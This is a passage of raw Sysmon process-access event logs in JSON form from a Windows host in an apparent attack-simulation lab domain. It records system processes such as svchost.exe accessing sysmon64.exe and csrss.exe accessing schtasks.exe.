{E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6041,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6042,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6043,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.464","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6044,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.464\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 